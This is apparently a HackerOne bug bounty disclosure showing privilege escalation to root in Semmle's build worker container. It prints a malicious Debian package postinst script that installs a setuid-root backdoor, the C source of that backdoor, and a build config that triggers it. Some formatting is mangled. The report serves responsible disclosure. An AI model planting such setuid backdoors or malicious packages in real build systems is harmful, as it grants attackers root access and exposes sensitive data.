Semmle: Privilege escalation in workers container

ID H1:692603
Type hackerone
Reporter testanull
Modified 2019-09-25T01:31:38


Summary about the bugs:

In the prepare step, semmle allows user to install new package.

By upload a malicious package along with source code and force server to build this package, attacker will gain root access to the container


  1. Create a malicious package contains the backdoor:

I use this guide ( to create the package.

With the content of postinst is



ps -ef sudo cp /opt/src/run /suidfs/passwd && sudo chown root:root /suidfs/passwd && sudo chmod 04755 /suidfs/passwd && ln -s /suidfs/passwd /usr/bin/setpasswd && setpasswd id &


Content of /opt/src/run:


include <stdio.h>

void main(int argc, char *argv[]) { setreuid(0, 0); system(argv[1]); } ` After that i will got a malicious.deb`` package.

  1. Create a config file to install this malicious package:

Because the source code is imported before the prepare step happens, so i will be able to install this package by point directly to it like this /opt/src/work.deb.

The install command now will be like this apt install -y --no-recommend /opt/src/work.deb. And it is legal.

The build config: extraction: java: prepare: packages: - /opt/src/work.deb after_prepare: - echo pwned &gt;&gt; /opt/out/snapshot/log/build.log - /usr/bin/setpasswd 'id' After that the build will failed, and attacker will get root on the container by running the setuid backdoor

PoC is attached below

Thanks & regard!


Attacker will get root access and will be able to dump every sensitive datas in the server!